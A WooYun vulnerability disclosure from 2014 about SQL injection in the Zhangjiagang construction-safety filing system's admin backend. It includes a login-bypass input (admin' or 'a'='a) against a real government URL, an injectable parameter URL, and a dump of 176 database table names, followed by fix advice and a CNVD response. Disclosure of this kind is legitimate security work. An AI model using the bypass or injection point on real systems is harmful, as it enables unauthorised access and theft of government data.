当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065615

漏洞标题:张家港市安全施工备案管理系统后台SQL注射

相关厂商:张家港市安全施工备案管理系统

漏洞作者: RedFree

提交时间:2014-06-20 15:48

修复时间:2014-08-04 15:50

公开时间:2014-08-04 15:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-20: 细节已通知厂商并且等待厂商处理中
2014-06-25: 厂商已经确认,细节仅向厂商公开
2014-07-05: 细节向核心白帽子及相关领域专家公开
2014-07-15: 细节向普通白帽子公开
2014-07-25: 细节向实习白帽子公开
2014-08-04: 细节向公众公开

简要描述:

张家港市安全施工备案管理系统的一系列漏洞可导致系统沦陷!

详细说明:

管理系统登录入口:
http://www.zjgjzy.gov.cn/zjg_aqsgba/zjg_aqsgba/pages/login.aspx?URL=Index2.aspx
类型:管理用户
用户名:admin' or 'a'='a
密码:任意

1.jpg


由此导致后台大量敏感信息泄漏。

2.jpg


3.jpg


后台一堆注入(随便拿一个测试)、MSSQL数据库,账户权限sa:
http://www.zjgjzy.gov.cn/zjg_aqsgba/zjg_aqsgba/pages/Edit_RyandQx.aspx?LoginID=2010072001

4.jpg


5.jpg


Database: ZJGCetc
[176 tables]
+--------------------------+
| ChargeInfo |
| D_Zfjc_Ajlc |
| D_Zfjc_Ajly |
| D_Zfjc_Cbbm |
| D_Zfjc_Dsrlb |
| D_Zfjc_Gzslb |
| D_Zfjc_Jcjg |
| D_Zfjc_Jcr |
| D_Zfjc_Slr |
| D_Zfjc_Ycltext |
| Fbfa |
| JLHT_ItemRypb_bg |
| JLHT_ItemRypb_bg |
| JLHT_ItemRypb_zx |
| JLHT_Items |
| JLHT_Qyblxxb |
| JLHT_Qyjbxx |
| JLHT_Qylhxxb |
| JLHT_Qyzzqkb |
| JLHT_Ryjbqkb |
| JLHT_Zjqz |
| JLHT_Ztzq |
| JLHT_d_Jjxz |
| JLHT_d_gcdj |
| JLHT_d_gclb |
| JLHT_d_ryxl |
| JLHT_d_ryzc |
| JLHT_d_ryzw |
| JLHT_d_zylb |
| JLHT_d_zyzg |
| JLHT_d_zzdj |
| JLHT_d_zzlb |
| Lxgl |
| MSS_Tousu_Msg |
| MSS_UploadFiles_ShowType |
| MSS_UploadFiles_ShowType |
| Manaquali_Msg_Receive |
| Manaquali_Msg_Send |
| Modules |
| RoleRights |
| Roles |
| Temp_Tend |
| Temp_zbba |
| Template |
| TreeConfig |
| UserRoles |
| View_Gwlxx |
| View_Jlqyxx |
| View_Jlryxx |
| View_UnionLogin |
| View_Zfjc_Tyxmk |
| Wdqydj |
| Zfjc_Ajxxb |
| Zfjc_Dmtxx |
| Zfjc_Jcjlb |
| Zfjc_Jcrwb |
| ZjgZfjc_RoleRights |
| a_AppConfig |
| a_AppModule |
| a_AppUsers |
| a_UserGroup |
| a_UserRight |
| app_Message |
| app_UserInfo |
| aqjd |
| aqsgba_aqfyjhb |
| aqsgba_aqyb |
| aqsgba_gcbab |
| aqsgba_gcjltzs |
| aqsgba_gckgscb |
| aqsgba_jsdwrymd |
| aqsgba_sgdwrymd |
| aqsgba_sgdwtzrymd |
| aqsgba_sgzzsjfabsb |
| aqsgba_sgzzsjfaspb |
| aqsgba_xmjbqkb |
| aqsgba_xmjlb |
| aqsgba_xmshlsjlb |
| aqsgba_yhqxb |
| aqsgqk |
| aqy |
| bagl |
| bm_project |
| bm_unit |
| cons_equi |
| contents20101008 |
| contents20101008 |
| d_ChieMana |
| d_ConsCase |
| d_ContScop |
| d_Credentep |
| d_Credrank |
| d_EmbarkSubj |
| d_EntpDuty |
| d_EvalDept |
| d_Gcxz |
| d_Grade |
| d_LegaUnit |
| d_Levelid |
| d_Listid |
| d_LxDept |
| d_LxType |
| d_MainSign |
| d_ProjManaGrad |
| d_QyGrade |
| d_SetupPr |
| d_SexType |
| d_Struct |
| d_TechPost |
| d_TypeId |
| d_Unitattr |
| d_belongarea |
| d_bm_add |
| d_city |
| d_fbfs |
| d_fbfxnr |
| d_fllb |
| d_kbdd |
| d_levelcode |
| d_njlb |
| d_projgrade |
| d_ryzc |
| d_ryzzdj |
| d_ryzzlb |
| d_tbxbh |
| d_tdly |
| d_tzlb |
| d_zblx |
| dtproperties |
| dwzc |
| ente_cred |
| ente_exam |
| ente_peop |
| ente_quali |
| fee_info_jzgl |
| fee_info_jzgl |
| fee_type |
| fldj |
| gkzb |
| glbmyhb |
| htjz |
| htsc |
| jgdj |
| jlzcb |
| kbjg |
| kbsj_kbdd |
| kbxmqkb |
| licence_grant1 |
| licence_grant1 |
| lykpscqkb |
| mana_exam |
| mana_honu |
| other_certif |
| proj_achi |
| proj_mana |
| qyjbqk |
| ryjbqk |
| sgrykfjl |
| szsn |
| tdgl |
| tend_manage |
| thtjz |
| tyxmk |
| tzsc |
| wdecolinf |
| wdetabinf |
| work_unit_org |
| work_unit_org |
| xctk |
| xmbdqkb |
| xmgz |
| xmjl |
| xzcf |
| zb_project |
| zbtzs |
| zljd |
+--------------------------+


漏洞证明:

2.jpg


3.jpg

修复方案:

修复后台登录验证机制
过滤参数防注入
限制用户权限,一些页面不登录也可访问的
数据库账户降权
……
…………

版权声明:转载请注明来源 RedFree@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-06-25 14:07

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心处置。

最新状态:

暂无